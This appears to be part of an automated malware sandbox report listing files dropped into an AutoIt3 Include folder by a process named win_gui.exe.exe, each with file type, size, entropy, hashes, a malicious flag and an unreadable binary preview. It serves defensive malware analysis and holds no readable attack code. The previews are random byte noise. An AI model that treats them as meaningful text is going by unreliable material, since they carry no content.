                                Preview:.<.Z..&...........S.RB..".S=..w....Y/.E.'.'.s...xn....J..$.[....5..&G#...q.,p...4..z..I...........z....x...!.Dr}L[._B...*q\.Q.;EE.B.yt.%...=..H...t....3.L.=.Q..5q..z...<...#.Tm1.f1..4..$>.....8..... ...g5..).=W.K...iH....;.#..M=$=.j.p!...M.E. U.u..q..7.f.p. U.?..E....\b3....x...Phq...%e...TSf&.n.....A./. ..P..*4v-.}p...........xe\.=..L/!`... E..i,.k.YE4`..w.;b.h.............I..p..>.D..R`..}.+...Me...m...........m....f..B......."V.).O...]...~3G..`.'...o.......H%~.J~?.j_./.`.3.....'.8..G).wF.Dhy.%.e...[.:l5..H...E..Q.....A.32\..cyq..u^..o..h...P*..$. ..p........<9....>.1lrR....!..R..c.CL....(.R..4@C...A......kfp,..E..yJ..pi.}.>...b..!.f...........4..;......'.....]..%v..e..~.~.......)......._..T....#."7:_b...jo,.@...T....mLe.2.]...*f6Y....u.....[,..4:`K<-.&..1&...`iw..N..7.053....^F.A...QJ........|.)E.L.K"..>..3.........d...U@.3..?dB...|"...&ty.vydH....2....F...n.+_....>.........`2...=....r.bS3.Uy.3..r...97...."`1...M.4h`x..

                                C:\Program Files (x86)\AutoIt3\Include\ToolbarConstants.au3

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:OpenPGP Secret Key
                                Category:dropped
                                Size (bytes):14341
                                Entropy (8bit):7.987830222270157
                                Encrypted:false
                                SSDEEP:384:xkauvt1+daIWOPrEiDtSNryP2BvKmC17gYwn+VOq:xkauvtwdQO4eSNryO8f7xq+
                                MD5:067F1517FD4BDFB132D8357C76907A22
                                SHA1:5D76C35435FA39632757800F4DEDC293D2F30F99
                                SHA-256:4DD510C1088B44DC099292A4C202DD4AC6277BABAABEEF153BE9030808D8E80B
                                SHA-512:FBBE0A2C846BF624814E17ACDD0D5D17683B34C5A7241D6AE2F1106B2DABCDE8BDF9A56F1C15323ECBE4FE68F821CB5BEC9CEAD0192A096404524392711B207E
                                Malicious:false
                                Preview:.~....H1 .O..S.q.=...I.O.*+...._p.R..gp...(.j....`...u...n..KOr..`lo........M.:>.}..,(....*/..X...A.].u.RLx..9..t.Y.TO.GO.}...'........g.{..m.L........]t....sf....`...s...>.V\.>`F.O_....H-....>..t.......ZF...E....oD...W.<I.Z.;{Z.,X.=.+i..QzG.U........&?Qf.....U..GQ..G/...^.z...B....dG.`|.z.......S.q..(...VI.....nD.N.nG.X"..__..%......Lz..@:.h.....,....y......3...'.0...R.iiV...J.IV..^e3.0.........w.0.(@{l(..g.....:......QZwt"Ax..p..V........2..8..x.mo......;v...j...Y..Y.#.P./..%oluz.....+Bd(I.57N.[.V.W.......S'.....W.?.7.R z...>.=.m..P2&...ulS.....$?...B.O....V.-wF^e3...;..C...0...<|0.L2..',v..C.'[b...4bXZ]u.&v..V.........v.......Q.......f.....yf..../......r....uQV~......m..=3.*.x.....%P...X......;H..+.n..+....Q.?.P.d..#.F,..!...'.h..k..S.. ...s5.o?.C.c|.#..k...h.Te...#.y_.......8.<.g........>.......JE[ ..u..5&AEd....q(...z.....u....K!..,|hk...Ql........*.@.s..].H.V.Q........*^.......r..BCE.Rq.....Y9..].+..!a.....w./]..F=s.3]!.:?

                                C:\Program Files (x86)\AutoIt3\Include\TrayConstants.au3

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):3273
                                Entropy (8bit):7.938864640053381
                                Encrypted:false
                                SSDEEP:96:WhYNSWoCkVxnn72cRtBDYKlOuvrYHevuAVOe:Whe/oCkznnycRtBDYK1ru+VOe
                                MD5:40FEE7ED1E55A9D50C78235CFD7A64BA
                                SHA1:C85876704CF0017949E9D5E8636CA8C2F2C47BE9
                                SHA-256:B5D56330E8F19FE93DD2342CE6E7A31CCB8511EEB52B7764D50F12E2F130C698
                                SHA-512:22AAF118BC3D76EFC5995C24228CC633B281ECC0EDD9D8D42A1E58BE742B64C26D882AC85624704226D71400628A396375980A1A6B7C0B0417BED2D5B9C3DFBE
                                Malicious:false
                                Preview:#xC.Cg..*....`.fek.G..3q......d.)..B..9....R.I...y.....S+.6u..i.4.P.e.9.-.Xp.)._J...Eh.X....H.S..2.P.".]R'.Q....@...'.kS..Z.......b..U8j......@KKl.8.@DH.DO.l.jl.^"S{..zH%.?.6.Al...u...I3.m=.z.....76..a.^...e........+..tl...u....au8&..k.>j&...... |....63.........lzw.....*...[.).L..d........A.>....\..".....m..N.n."W...7......Z.C...-.%..M......'.......!..bd$B....i.,O.kP..."..F/.g.....$..{...?.:.8S..{.l..p...!....I........G..g..@yw..F.!.r.6z..DpM.@i.H..6*.fe[..x...tP...b..j....w.R...._...E.....Nr.p..E.C.D9%...h....8....1+.D...L...I....w.0..j..k.7f.a9....54.b..]..J..e{.......X7..[.[.\...7..~e..T?x..'/;r...2....._U..}po.}=3.....hj!UIbk$..8.2./...W.:..s....9.Kl.;E<Y.Y...1.......U..A....;h...j...O.p.xj./.Y.3...z..|...i....)....f lM/.hsrD.].....&.K.rV/.4A_.h.......wWG.v....K.e).2.#.\...~U.r...7.9RF....z.C... ....\.T...G....q.xS...:...0.9....b.g..R.Vt...GJ(.v)l...a..@........^G.M.......Rf>..s$J..'.s....]...~S...R.....|].BL...%.^0m?^n...}.....$S.

                                C:\Program Files (x86)\AutoIt3\Include\TreeViewConstants.au3

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):10009
                                Entropy (8bit):7.982759594693455
                                Encrypted:false
                                SSDEEP:192:6lTT74659Fb/M6Du5WwxoquGq5LE3ryMhR2CGsl2d+VOF:yDpb/MBP+qTpdhR2Cf2d+VOF
                                MD5:09894C57565368FD054FFE7D6DA7DD63
                                SHA1:EC8ED863644CCBCC63FAA0EEBEF9605EBDEA7DAA
                                SHA-256:8DB5FDDC74AE0C456D8F0F1DCFB380F5B3D3E8E0D14343EA85C2A18855DFC171
                                SHA-512:0EF28457976A8E6A64573C7C2B847158BD7E85ECD3058D29CEE1DCFFDD0BFE289AB6FF84EBD14B8B39CCB8EE3E548B9B58B3F90A3D2FD04DB56A7D8879B4BFCB
                                Malicious:false
                                Preview:L.O.../6T9..i%.....F.T`..x......[........$vw.%.}.<.....p.b.s..W.~.]\S........a. s...*..mV.=..(.*IA.S..D....q}%.(K....=,..r%8.%=..'..'o...........s...I...E&h.v.D,.x..?.....|8..{....#F..=..{EQ..,D.b....ad.]...j.."(....!6C.C..,F.I.s.I...i@..J..YL..b...tWT.Tt;5..vD.........\.a....`.-....zq.`....N.....1..f...t0..,.^...,l.w...'.?..%~z."..VRu.$...@.@@.?...m.78~..C.Al[..*.P.4*...K....'..g~......B=5T..)!.......ZsC....MT.@.a......]:Y2......Lgi~.iG.#."T."1.e.W[....d..Up.2K..Q.kS..X.K....2..y.'..Bbr....H.5.dX._...........G..d.e2l....3\..x....K:2;..a.B..q.h_..c;......f...cXG"z5J.z<O......d.....>.Y.8_P.w.......}g?..5{...q~c.?l.2T..sE]R.vL....I.........N...@C....q~......Y.m4..qiP.i.......cSV.....Z...4.a..)i3.3Mq.wBy. ).g9...[.../.M.E.wk.Z.k._>..T.`Q.._.{....$......C.*.w.....R..{7X..dZ#.9.F3...Y.5d.;._..)~........6%X..#j.g.....v\..-.H].M#w.=...X0.A.....D.UA..-dgQ.~...2.4..Z\.......Sz.<.....^....V../..."..[.".<..."f4../.*.......v.a.LI...8lS....v.u.

                                C:\Program Files (x86)\AutoIt3\Include\UDFGlobalID.au3

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):7297
                                Entropy (8bit):7.975410771018185
                                Encrypted:false
                                SSDEEP:192:n86N8K7e//WyGCRx0kx+DP4QpkCpHqAaXerbe7E1S8W+VOv:/z7UOY0HkwHKerbe7yS8W+VOv
                                MD5:F5FE8E66FF5745735032F6C4C75CF857
                                SHA1:462E7DAF0FD229CE183ED705B92C2013B185BE0D
                                SHA-256:E7BC6D464EA6E77C5A892A49E9A708D10096D560F8110781537C64A291DF57AB
                                SHA-512:1FB2A3365A3D6CEA00524CD4B185F814CE7653239A05EB9ADC72B95AFE463EDBED5250D0F169617BB2BE5F92A28E563339C20FD3D9A39784F9FE2A412A2D5A13
                                Malicious:false
                                Preview:.R..M........o.b.J.{z.....h.....:....*QM..s.*6:.H.........3(.!*.u...o...V.vS.?m..k.G_hdVz..3a.sB.PE.t;c.0o;A.......,...X.$.+.9./.6..-.x._ ...+.i.........p[......A!~...ZCW.R.CrU.g....9x2..U..`LA.=.M.*P%mZ...;..;e.z.....9Qm...-w.T;1.03.....@.B?.E!q.d6......w.@&E.fsR[..y..F..>|I.......G\Ec.>.2X"0.n.....|q..L._..J..?x.I. ....%]@k..Z.... ..G$..Wa...:G.X,....o[.X..I...O..}.....<H..|.%Q'.^h..m..z....8.Ip.@....(.......'.....B/..&....34..a'r....9gTg..{s1.Zpt.....H....G...Wh.P..3.(......q....n.m....*4.3...4.h%.[..z."&..f...Kz..wq../...W..]'./A.{.-J..j1.?........R.xl&......$/5.e.F..{..."9~...T...V+@@+.A.$..gH...R.i.".E....zZ........W%.6.s....q..........xOF.|..ep.S..U........+Rc.....!...DU?..-D._ ....fG..s;..%.N,X>rQ..dW.T..k.........j*..h....*.H...r..p .8.4..g...g.U...;..@...z..^...;.]..#..d.....M.....{0.aV..S$..()[......`~Z...!7.G.G.!......F>z.+[...."...._vt.M.(=F.p...].X.....u%;.....|.'!.....M....TSj....FO...E.. Z...X...9.WK.%i.....f.L..m..?`

                                C:\Program Files (x86)\AutoIt3\Include\UIAWrappers.au3

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):110649
                                Entropy (8bit):7.998577390807684
                                Encrypted:true
                                SSDEEP:1536:b+zJ499sDgfP9aYIDzb0RG6ve8dFdVjzNRC5My7CrFUX9wBqjoZfbTZNplHMrDcx:biJ499sDg8YuAveIVjDqHGRbzT3s8x
                                MD5:8524DE3FCD7AE23F7D7A9CEEFADA7CF4
                                SHA1:A34EA92656E68D9F408C7362D40ACBD805522986
                                SHA-256:C4FA6FB9E8614F7D572FF693ED8A41CDFED4D094D947CF22380D2889DCA70698
                                SHA-512:C99811C3BD781128FC679B40F88E1F4A204717007161E390881712575D95F763D5D28301F5EE70097EB0C217687458AE0609DA17748ED89578F3E543BDA13F40
                                Malicious:true
                                Preview:ZAE...8.Wu.2..r..#../..............R..q=.|"f.....@...: ..{n`f..!K....8.....`..xl.k..y....{...ed...k.).J.5.n.\..N.N.@._.wb.c.Q.sO..0li...Dv.DA)..Q8he..@..iQ.v.L.K\......T)..y.t...w.....R.P&..q../;.Q_...w.......O9.x..KA..F.~..............s...<2....p.......4_...w.....%u.m..j"[_.E.fFUH}".s..Q.R.\...f.H.'...#....]....L..e......?....v...~....?..O+.V.+.D....Z=....@..Z...9...<....lw\g.....f'....g..%.g`.)!....."..y..~....No.Yy..Io6.R>E.rP.R.lC...C...../..I...0.....1..n... ....n..m..-....|...i.....K..]u...o.'...Pkf.fuQp%.t.1...^.:.._.......ie`..w....]3....P...=:..l..r...\:.;g.F.....z.8d@...[^B.....r.?G...[m...o......7..TA;0....(....n?{w....R..B.(%.C,......\iI.h.+C..J.....>/..[..G.=..G....q.........!.}..=.3.....R7.7.T......M;..`....g..*..'.d2.9....N....=n.%....q.Z...q"=.by.._.....g...n!..f.'w............t{D..g.=...`(......W...~$..0.....c.o.K.;.....}..1.<.3...r.V.oN.~..8p..1....s..v^.1..Y?......D.y...}y.}.@x......767AGg..k.#S.{.#tL.

                                C:\Program Files (x86)\AutoIt3\Include\UpDownConstants.au3

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):1759
                                Entropy (8bit):7.867088924016625
                                Encrypted:false
                                SSDEEP:48:7Sjc0wCFkZlwMf7IfeZ/WyYu+MAVMJg6T1j:7SrwYkZl5f7xevuAVOZ
                                MD5:89C66F176FD881CC66FE355194FC62F4
                                SHA1:776A2298CD9B2D1A31F44530CA55D2C34ABB3290
                                SHA-256:70F5C7709A1885CAF92AA16E34424A27338FCA2239C66ABFFA4A4AF5AFBFDE1F
                                SHA-512:46498D02B2D98DADCFD88C1E094474B9951534AD6C00E11AC476A9D654BC93F8EB5BB3105EDDCB8F12F96DE831B6695D57C07D118330A691102DB7524CC6B03B
                                Malicious:false
                                Preview:Qlp.c.a7....C.n..8...N.=q...j...&_*.9.RJ.u9...#l.0s...'..3{j.%....L.*....r:rYl=....9mY..`#...t..M66<...Q^....<.....Aco..+A.~n. Bme....q.Z.[.3.B..d.a.v....S....)...j...{l.>.;{RC.J.C.N..p.}[ .7-.!2..S.../;p..O/ ...X2..Z..8B.H......j92...._p..&...^..[ .....b~.1....._....$.`.~.......fE%,gDV @9AG...K..To$...'J.\....rD..y..i.8.D<....9 W.......q?.QP.f..m.}.m...aH.$..4.q.Z..P....Sb....k6r6*.:.......f&[j....'...d...#J....=..dg.~.*.W.........nm..>FmN_......u...."......!.D......|.....$......n..>..h....<.;...R.H>..l.m..bc..*.5o...d..7.....S<pM..%f..&.B..>.0.V..+.NKNV./+...Z.&I.g....%...l...#N.d....0.6..%..6.:..!x.kz._.......3}.....[....3...4...=.).S~.4.P^.../..U..-....C.;.........Z.@..Z.p!.....Ux...c.`.d...h..B.h.Hr.U.<".;..?.^..]...'....a.g.I.b...{c.{..(.^.<......{-......G.<L.....>.>q..y*..!Q[~...C..i}.(...M>.....8%...n.<W..-OT2....R.`..j[oiDrW.V!B._@F..l_...;k.g.y.....]..0'.V..4.....A....j..../...Xl....[.!.Wuv.D....|.9.....-..T4....)..{...

                                C:\Program Files (x86)\AutoIt3\Include\Visa.au3

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):40581
                                Entropy (8bit):7.9951768017936375
                                Encrypted:true
                                SSDEEP:768:jvs/ZJkMnuTVLnDZY6xH1J5xfcyDhrM4jgMayXpApR2MXShT0LSoPlmSxRVS0i:sZSMniDS+Vvxf1NIzM7ERGhT0LSoPlFk
                                MD5:64B7397C9B6F61D857A2D0B9F426C05B
                                SHA1:FEA3235CB5AB6757ABC09FFF6B1DF6476F2A8FF4
                                SHA-256:1D99FE25D330E8C7782A8455F191FA388430DB7916FD96395E6D534138137B86
                                SHA-512:0F49762524B68536A71E89A7FCAA1AEE5A8C308144A7328E45356F4D65627C81592E1DF2254750B30669BFACA51605A0563F9212253609576CF0CC5DA737AD08
                                Malicious:true
                                Preview:Q.CC.4!X>G. ... ......0.87PdH.!|....QJa.{.!.......S.*6@..b..>.O..9.E..)|..a.Y...].v.}|..}...V.e.F...8.kw...B.u.!g....!..:V..$<.f/K......!?.5.D.....f...u...v.n..W...$...{....x.Ej-..j..D...Ms.Ki....IO.9f.v:..L.Lu%Go............/.$L7/.J.R`6....w_.K.C...n.o.[wP.4.}.0)\.-.D...K..N..Y..$..$.;..^...R....'......q..N..m..m....y.u>R..1.......D?..G.q;r.........d...W..#.r.L30..j7qSY.i...0...S..t..5.9b.i..h.1k...p5........Yf9../:.z|.<........0%.p....)....j.f:....`.$..a6..s.V.e.=.....}.=OY.S. {D,WU.)._..Wr.*.R.W..O<..p..|v.Q..Z..??.....+.....5v..}........7<.........<.+._'n...B...y&.$.#S.K..O..~.O.,......,.r...'.?.><n.}Z_...q+.Q[..O..%f.......`.7}.i.5H....5..........b..9>..h...X]..u....t..Pk..J.u'.iU......1A>uG.B...b.6#m..G...n......./]5|w..>......>!%..*%KA..ww> .A?X<.|l.......4..).2..l.e..........5|1.......2......&...*.B.V...{.....L..p;y.p.c@.d.<..D;..Y".....`.*....KS#..i!.......~..k.Q.4..Z..._.U.3\..o.h..?..... ...B.S...2.....Z.......U...

                                C:\Program Files (x86)\AutoIt3\Include\WinAPI.au3

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):2128
                                Entropy (8bit):7.902718904780669
                                Encrypted:false
                                SSDEEP:48:Kf/L5JPVZ3ZAmu60vzb4+6agFfCo8tRN/WyYu+MAVMJg6T5w:EL5Z3ZAm4GagWNevuAVOi
                                MD5:39409E191C1069EB52B277F43BFD5576
                                SHA1:A33B93FEDA63A97277AD08A50C8EEFEAA4377420
                                SHA-256:23FC7C293A383FCA53476195FFD4986F42097A0A154596F4B42A96BE9A6E4F89
                                SHA-512:FB79DDCA32BC73DFE7FEB2C5A4E75354CE2B1D84F6EB9E2F1BBFBC6C90C80C69A0C12C29B7A38C4D0FD713CD171AA0C0CFE1D7D0A057C0E166FDE9519D4BDA85
                                Malicious:false
                                Preview:.;$.2.d....W...k9..`.CF.@....vE.......".A..n.....`2H.f.<..N.....z..t<X0y.?.[....<..L...3....*?.l.60.<<.?_Z*.HC.9..zi.#..AV.v...q..;..`..jt.i..=.O.......qi...q..,q.*%z.ul..7....#.w.B..../......E...He.....GzX...c.}... <yM .Hy..F..P..z..n..I.r.G|...n.....0e.H...dFn.M..da......m...F...k./@W.....R...9.f...gm..I.s.&.I....E&...O.K...O..z.......{xAe.l.!..E..B.%,\./....f+mS%.-)+..V.0~.._.g>g...~.....U$4>.2..*G.D3w8|.%.F......m...d..8...,l..1.%[."..m..OjnE]...K.U.e.....~>.$.F....jc.........Y_A....1:.&..'..5.".....2../.@....[E...^...F?0$;.<r...}..L}*..|9[...T..2.Gm.iZ.kER....Y....J..5.i..g...a....C\Eb.[...A.....U....[..8.}04+I1eK0r.....Y...w..e.+j7...Z.}~a'...2O.C..z........2...i.T.vG..<.d.X..]~. =.... .B...v..........jf..{T..n..\..Ig.*.AVR...kC..Y"..4.=&.3..$..D<1.K.{......".<..Q.35.,n.C:.M.....v..w.....J..UD."..QFG.:.aE$.^.. .8r..fZ...3Q..:.*S.:...N~I...ND.6../..L.....P....i.tg5f.......L.p..p....-...tX.kh.....,.J".:7g..:.w....j.w..{..."....|..J

                                C:\Program Files (x86)\AutoIt3\Include\WinAPICom.au3

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):10082
                                Entropy (8bit):7.981733784576309
                                Encrypted:false
                                SSDEEP:192:Svq8vhPXwMxpfkO1ASsvPHE3Uci3v8QUjcGAyi+99+VOA:SvZPgMxpxsvc3Bi3v8Hjcqv+VOA
                                MD5:BE4D5BEF4B7E200A8F58F52C29EBF202
                                SHA1:EE381169A0D617C7BB7A9D8B79D0F928F5DF9B00
                                SHA-256:1CF9C28DCB5C388FB4AD385674731643B4C30C4E8D017F1F26F245BF4733E11D
                                SHA-512:8613EB1FECC7DD6F5434CEF2769F634AA4DC72CBBCBD0346218CA468AF2ACACD26C8E9FA14876BE93F0CC1AAB5249EBE26883F85A9CE010E10156D5C9B7E330F
                                Malicious:false
                                Preview:._.:.K...V...b.RD..5.]T..x/n.z:..:.$y....v..W....4&.{...V..;.s/..K..*c....s`.G`Y....g...#..E.....T.g.N.e...w.....6F.......^Rx.PN..a.e.o.'r6~.%.vH...2iL[M.*C..D..[nM.....5[...e..?'..\.$....3..44..R......fxB.UD|#....A.x2..5r1ol[..nn..[ ......D.3....q....Y.I..6.F.W\k..P...... J.......}.xR.:..m..F.x..e.I.RO.O"U.....~().wBEc...%....ia..@.Y..]G.....E?..........30.7V...*....O....s+M}.O...,I.;9>.U:......A..x.Oo>_t..U.D.z.*..4.Lq..I.G..a..-....[$c.9.~..e8<..9.C.{y.u|.......G5...1.L.D....=..........81.jR.$...e..p.g/v/.Ow;.j...L.C....7G..\!(.e..S....1......=.$.......S[ZU[.fU..]....3.]6...D.A,.E..T....U.P%...&...~`.M,.C.Ml..eb..,.....+.. .)..a.. .K.7......!.]Ws.Mm.1m...<........S...|K.).^..Wd.\....7..j...Y.........4..A...Qz.j.T.S:1..zO>)...Y|>C.'[.G4...(..u]....bs.. +.{...0..*F\..y/.Nv:q%<.[..y..lq..Ci'.....j.T....O}....{...........9..b;_.|.......L"L.W.^_.a..#....p....>41.>..,^..u..D........6.Jd..A..\..X_.....dU..xVf.R.!...9......]..y...1..YH7.

                                C:\Program Files (x86)\AutoIt3\Include\WinAPIConstants.au3

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):6066
                                Entropy (8bit):7.972090817515263
                                Encrypted:false
                                SSDEEP:96:DBDHvWtj5yyukkKAuI0VtCqCKr1+SkstB6/+gcsxBmqS+X3HgevuAVOuC:FDHONzBAuI0rFCKZ7P6Ggvf6aXg+VOh
                                MD5:449FF52EFC7F09FDD5922019ACD03292
                                SHA1:87240B46CB67A486380D14471ADC0B410AB1B3AA
                                SHA-256:684857B10C84FCE80E94BA379C6EAC8F506ADB8DC997FEE67A2303C34E8ECDFB
                                SHA-512:31C7CA95FBD416B12330E4E4B6D1FF11639127D2471D20CCB83465FCCB438D32CADDD44991A8B538E19FEFF45A818CFD462A1472A16803F952AFC37D27D3BCF4
                                Malicious:false
                                Preview:..}........H.H...Dw.YJK.)....D.).J..>..L.....r......N.7.:.g..G.........Y..Lb.O.K..nl..$c.(b..`...p.rNrN.v..Z..Quw..Y........R#.(.6Cz+un.6H.:.....k.........C......]."....w.b...`...W..A[........D..xGI.9..cxP....^..l.f..T.)[4C-.f..|..k.dyJs/..C!.....L...-W.R(Z.b.<X.i.....&.../J..i..l.6.....b~.._o..PWrd...P..1.z..3G....#.8...N:r.t......i..........Y.A..6.....+..`...a..d...P..s........Yp....LC....*.=...Y.......5..L...6...\.v{Pn...].W..1p..R......I....D.....% ...z....U~.....".M.N...E}.....v.u.n........f.r. x..j...v_w.O........G..ko..]...G... A7.IE.....0k?D.....#,.Z.*..]#.:s.H(n..J..!.g.......\.:.MN{o..M.-...Pw..2....{F..\....*..Y;iDt./....%O.I\K,...D.W(.w.7.$.].T.X.$.u.$.uKx....!.........u.% "bB..Ex.d....c&..D..@.&.A...p".(.PP."v.0+....."!M.]..k:z....J..eG.w...w.tS.......L.f*.U.c.|..5..Ou..?.J<]^7.t.....p...v...hdc..P5,.0....).:u..N....,....?.....v8...TJ....?*i.p.....1..@../*C.`xK..........i,..l$.+.1...y.G./$... q[.Z.kNJ....OI..f/}]g../'..

                                C:\Program Files (x86)\AutoIt3\Include\WinAPIConv.au3

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):30168
                                Entropy (8bit):7.994481161928793
                                Encrypted:true
                                SSDEEP:768:YNU7Tg00l1SPbp6HgFvIJrAG/P0Yuu7WNYFdf:Fng0c0UgdIRHUY9I85
                                MD5:74020D873E06EECCAFE0D4CE11146CFC
                                SHA1:70C2D7CB0898F567772D6C34B5BC813335C7F116
                                SHA-256:EAE73B968C0CD53327458886310F82B9C83066E17F360886179B6407352CD18D
                                SHA-512:6ABA26998DF21A8F49B6F30A032D534F7AC4220ABCEEBEB4BCC5AA558B200A49ACAF0185C7C0F26773AFA1E176E97B1AFDD67A24A1E957E54D2D20EEE42890D1
                                Malicious:true
                                Preview:.o...1.J.`....eK.P+.k.,|./|.....ya......l.N.s.y....%M.ir.n.R..u.~...bGW.z.];-...=.i1..........G...NC%.jm....P.....puNU..v..6eop...).d....@q..;C...m..;.....3...B.&Ba.wI.G....v...$..d.k<....nW.g".T.d.j...3T'.}..d".,.....tb*=#..g........mg]}.+fs..L.J......x..U..\.v.oI5....7n.#...u.v/....[..lB}{qp.?.A^QO.@..........?..........9....'M.&x..=n..'.%9.....K.I(....HFEC........J. b.$.....L^I.}.s]...G....p)...{.....Y.......XB..$...W..x.5..-......CC.6t......5..k.;.....c..6.7..Two......=...8."..>u.1.96.;.;.....o.e%k=...\x.B.VG..%.H.._@.+..`.$.._2.L..".F....e.y1G0..?.S.i....P.....ms.&T.t5.Y..&..+0.]*..-....c..p..f....A..~.Yu....IZ.\._R..2.}...u.u9..g...yx.;..&....K..7.M.......)..#Y..Bs......3...`$....{.......a.f........l ....$lHS..A....5...l..@.M........`~..].-.U.. .BW}.....Tw?_.f.>..[........{j...q@L..LG...xk.....6jn(....._.$.......g..(..T.`;.'q.k.#mq.....rW..0.o0..%..,/.ih......^.w.....]...[b......4.}...$....^x......Fh.z......)..q..d..&s.$R...*!.

                                C:\Program Files (x86)\AutoIt3\Include\WinAPIDiag.au3

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):33490
                                Entropy (8bit):7.9948156280750355
                                Encrypted:true
                                SSDEEP:768:ligBB+TXUL1Z3KfD3M1QK/2mx0L3KPU+zh8ePIXPfF5NqmqY:ligBB+TXUJZ3QD8r2mx0L+NFJw15Nq+
                                MD5:90D91CAD42D4582941239C027FA6E5CF
                                SHA1:450207A06D3F90BA710AC58E4DF1FA0FEDD6FBD9
                                SHA-256:A797AFD81ED1E0442E3011C2E007BC44F2AF799516CA25EF46886320C86FEC57
                                SHA-512:8C97E2A2975F5E5D4E2C87D16BFC1037B0F9DF70F7E51E5C3DFB60DCC7F2CA421DC5AD17AC914CD3C205EAC05AAC5E3882385F161D12AA86E71CBD65DC95F35B
                                Malicious:true
                                Preview:YuB.I...&.....5\.g..6..15./...c..B..ip..qB......%~%....g).9.........B59.....T....3...E@i.;..tv.n...c.M1#..c..X.;s...%................C.c..e.c+h.+.W..xqq8.J...sS>-B..\...P_h....3.$...54Q..=..&....~Bq....d...9d....!m.r....(.A..b.#<F.j......~.4.UN%10..#...j.K).H.....^.e+W..E._..P/.%.GB.j......N...@...q[;......y7.;G...D.r.Fa..o.D.IV..i.9...h`4,.o.....>..y..c.n.z...S. ..>..1...f..;......?Z.g...]].q.......^g.....]2..6...0^.....n..?.J...#.:lB.-....8.h.....T.K...Q...Bt..17...?..FU....8..-.lY..N.B;*..d..O......<]|...zI.V.......Qh0C..Hq.s......,.=....(.... &..4.Y...E...^H..kL7.3.#`....E.pw.a.&....`.y.lo......5.1.8.......s..td6.X.....t.0CJEAu0_..<.v....=....O.\....f.XRR.u!..v..B.h..1,......q.9...:0.W.3.T.4J.......?..C.%.........Q.D...C~.......D....x.*H.$(VrL....L.%.....5.|5.L.N.w..C.0.. ....K6. 1.......P...]e.....h.....eLq..o8'..Do. *..D..y.....=...?.......i.......8..6ra...E.T..T(...j@.A]!.=...,.e.>+.....;..e...,...KWt...z3.sb...{..

                                C:\Program Files (x86)\AutoIt3\Include\WinAPIDlg.au3

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):39594
                                Entropy (8bit):7.994625408041425
                                Encrypted:true
                                SSDEEP:768:3WZXM1+ZRpeKcLtQKJDFbxfvlZC4D6QhlemYoFxSIEmOAcRp7TZfFM/RL:IRpeKatHBxXSc1hle2WPAcRp5ts
                                MD5:F114C3EC82259355422D39744E3DBC59
                                SHA1:9E814BC8EDE2AEAE39CC069D96FD49319C8CDB85
                                SHA-256:BFFC2973CB5B92AFA61A27B557C5089BD2555648FF7E2140088A360901118A04
                                SHA-512:18D43FC74EF7E602A7644D642F8054E70604A35133360E296E56A6AB131FB23291F0F277EC8505BD074907762FB31E26F687E510E86920464C2471BC232E0D17
                                Malicious:true
                                Preview:.......;.8.&$.9T)..d.J.0z.2A..**.."'l..a.7..KZ...X.....1z.....X..+q..RS.c..t..7...y..7JK.....*.]=...,x?....kL..rWu..4..Z.W5e...S.....[.M..O.{}4.$...^u.8..k..e_..x..Z.a.........@..[.vav.....S2..Q....U..;V'-p ..8..uUP.<)h6@.....H..Al......t..B.]V.o(.e....v.I....wy.#{[.&I.|:....h.lX.@.o$...Oq......u...'{.M|.........n..eU9'F.....G>..h".W1.........|$&.X.R.3..........e.]......._....d.,.(....b_%......G.VE.b.My.h..vG...W..S(..DA5d...}........\.fz..LR..L.e..Q\Gq~..^%BT0....`..A.-....t....Ow.4.K."K(...0..rFG{u..mfQ.P..D..x.{_U.@.......|^..U..G.W.x0..F......S...U..U$..5.Z.!QR.g.M..;.y.I......l.4y..6...........i?.f3..^.}.M).v...{...D1..vjY.@...E.4.(Zd....T...].?,{1..8...b...m.4p.....9-A...f.c@CR.Q..Oc..x..._~..'.......k...........C7Z}...h.C...T]....8>}.%.,.'..`_g..5...\........4B..y.....<..4Q.'.0....)..../...8S...8..TX3.x9.H...|.....!...p.q}.......^....V.N"`=.j8...~+.[..fU.r3 !.M.Q.a..*..{..R....6Igj.f.^.....NOw...5..|..z..%.9.w..;.m..?...1....L.._...q.

                                C:\Program Files (x86)\AutoIt3\Include\WinAPIError.au3

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:PGP Secret Sub-key -
                                Category:dropped
                                Size (bytes):12615
                                Entropy (8bit):7.98572150547311
                                Encrypted:false
                                SSDEEP:384:Uux+VS3JVTjm4Dzt+qp+l8jXGY1JDUGpv+VOX1:nxg6K4DpmjADbL1
                                MD5:33797C6A0930B40CB083058C0657921B
                                SHA1:EE461057C59EDBE3A6A667CD124519D2C8DDFCA3
                                SHA-256:04F822E42C0875ECBF5123795070B47791909FDDBC7ADA4942B178DD928F90FE
                                SHA-512:7EE7BC3F4BF66AEEC2A1AD025CBBC77A23B82C88D99CF946617C47A5F717236814B703B0756F820D8F460EC73B2CFDEE09327730A3E62156ADD8FDB87A74CC2F
                                Malicious:false
